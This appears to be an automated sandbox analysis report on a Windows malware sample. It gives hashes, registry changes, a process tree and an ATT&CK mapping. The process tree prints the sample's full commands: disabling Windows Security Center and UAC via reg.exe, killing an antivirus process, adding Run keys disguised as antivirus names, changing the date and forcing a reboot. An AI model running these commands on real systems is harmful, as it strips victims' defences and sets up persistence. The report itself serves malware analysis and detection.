Analysis
-
max time kernel
52s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21/08/2024, 17:15
Behavioral task
behavioral1
Sample
b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Errors
General
-
Target
b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe
-
Size
154KB
-
MD5
b453d40f223cf35624a5adc36c40fd39
-
SHA1
194f6a9df8de4d8f26e0f3b10d64a850b43880a7
-
SHA256
2091da27bcd28527d5c5afa71156c080ed7299af87ddd8b703f9935cd51d8e73
-
SHA512
a76190f34d7868e834fae148703d8e7534f2886e24fbe6952acb6a59d36735b902f7da02b85883b86c349fc012ae711be195e137198f08d081bf99dd272cbee7
-
SSDEEP
3072:qLsZ54aDdodEjH5CXJ8lochRroyMD5SnD4Thtov4BXZcM5ubSuFxeDn:qgPDdodEjZLL5oyRwhtovGpcM5ES2QD
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "0" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
resource yara_rule behavioral2/memory/4000-0-0x0000000000400000-0x0000000000468000-memory.dmp upx behavioral2/memory/4000-2-0x0000000000400000-0x0000000000468000-memory.dmp upx behavioral2/memory/4000-9-0x0000000000400000-0x0000000000468000-memory.dmp upx -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\avgg = "C:\\Intern\\avgMonitor.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\avat = "C:\\Intern\\avasts!.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\load = "C:\\Intern\\firewalls.exe" reg.exe -
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Kills process with taskkill 1 IoCs
pid Process 2556 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "91" LogonUI.exe -
Modifies registry key 1 TTPs 8 IoCs
pid Process 3820 reg.exe 4916 reg.exe 740 reg.exe 3016 reg.exe 4904 reg.exe 4432 reg.exe 3108 reg.exe 4744 reg.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2556 taskkill.exe Token: SeSystemtimePrivilege 828 cmd.exe Token: SeSystemtimePrivilege 828 cmd.exe Token: SeShutdownPrivilege 1104 shutdown.exe Token: SeRemoteShutdownPrivilege 1104 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4024 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4000 wrote to memory of 1140 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 84 PID 4000 wrote to memory of 1140 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 84 PID 4000 wrote to memory of 1140 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 84 PID 4000 wrote to memory of 1076 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 85 PID 4000 wrote to memory of 1076 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 85 PID 4000 wrote to memory of 1076 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 85 PID 4000 wrote to memory of 2068 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 86 PID 4000 wrote to memory of 2068 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 86 PID 4000 wrote to memory of 2068 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 86 PID 4000 wrote to memory of 1980 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 87 PID 4000 wrote to memory of 1980 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 87 PID 4000 wrote to memory of 1980 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 87 PID 4000 wrote to memory of 3296 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 88 PID 4000 wrote to memory of 3296 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 88 PID 4000 wrote to memory of 3296 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 88 PID 4000 wrote to memory of 1564 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 89 PID 4000 wrote to memory of 1564 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 89 PID 4000 wrote to memory of 1564 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 89 PID 4000 wrote to memory of 3476 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 90 PID 4000 wrote to memory of 3476 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 90 PID 4000 wrote to memory of 3476 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 90 PID 4000 wrote to memory of 212 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 91 PID 4000 wrote to memory of 212 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 91 PID 4000 wrote to memory of 212 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 91 PID 4000 wrote to memory of 5008 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 92 PID 4000 wrote to memory of 5008 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 92 PID 4000 wrote to memory of 5008 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 92 PID 1140 wrote to memory of 4916 1140 cmd.exe 102 PID 1140 wrote to memory of 4916 1140 cmd.exe 102 PID 1140 wrote to memory of 4916 1140 cmd.exe 102 PID 1980 wrote to memory of 740 1980 cmd.exe 103 PID 1980 wrote to memory of 740 1980 cmd.exe 103 PID 1980 wrote to memory of 740 1980 cmd.exe 103 PID 1076 wrote to memory of 3016 1076 cmd.exe 104 PID 1076 wrote to memory of 3016 1076 cmd.exe 104 PID 1076 wrote to memory of 3016 1076 cmd.exe 104 PID 3296 wrote to memory of 4904 3296 cmd.exe 105 PID 3296 wrote to memory of 4904 3296 cmd.exe 105 PID 3296 wrote to memory of 4904 3296 cmd.exe 105 PID 212 wrote to memory of 4980 212 cmd.exe 106 PID 212 wrote to memory of 4980 212 cmd.exe 106 PID 212 wrote to memory of 4980 212 cmd.exe 106 PID 5008 wrote to memory of 4432 5008 cmd.exe 107 PID 5008 wrote to memory of 4432 5008 cmd.exe 107 PID 5008 wrote to memory of 4432 5008 cmd.exe 107 PID 1564 wrote to memory of 3108 1564 cmd.exe 108 PID 1564 wrote to memory of 3108 1564 cmd.exe 108 PID 1564 wrote to memory of 3108 1564 cmd.exe 108 PID 4980 wrote to memory of 4744 4980 cmd.exe 109 PID 4980 wrote to memory of 4744 4980 cmd.exe 109 PID 4980 wrote to memory of 4744 4980 cmd.exe 109 PID 3476 wrote to memory of 3820 3476 cmd.exe 110 PID 3476 wrote to memory of 3820 3476 cmd.exe 110 PID 3476 wrote to memory of 3820 3476 cmd.exe 110 PID 2068 wrote to memory of 2556 2068 cmd.exe 111 PID 2068 wrote to memory of 2556 2068 cmd.exe 111 PID 2068 wrote to memory of 2556 2068 cmd.exe 111 PID 4000 wrote to memory of 828 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 126 PID 4000 wrote to memory of 828 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 126 PID 4000 wrote to memory of 828 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 126 PID 4000 wrote to memory of 1552 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 127 PID 4000 wrote to memory of 1552 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 127 PID 4000 wrote to memory of 1552 4000 b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe 127 PID 1552 wrote to memory of 1104 1552 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b453d40f223cf35624a5adc36c40fd39_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 0 /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k taskkill /IM avgrsx.exe /F2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM avgrsx.exe /F3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v avgg /t REG_SZ /d C:\Intern\avgMonitor.exe /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v avgg /t REG_SZ /d C:\Intern\avgMonitor.exe /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v avat /t REG_SZ /d C:\Intern\avasts!.exe /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v avat /t REG_SZ /d C:\Intern\avasts!.exe /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v EnableBalloonTips /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:212 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4744
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v load /t REG_SZ /d C:\Intern\firewalls.exe /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v load /t REG_SZ /d C:\Intern\firewalls.exe /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k date 01/01/20162⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SysWOW64\cmd.execmd /k shutdown -r -f -t 5 -c "."2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\shutdown.exeshutdown -r -f -t 5 -c "."3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3977055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4024
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1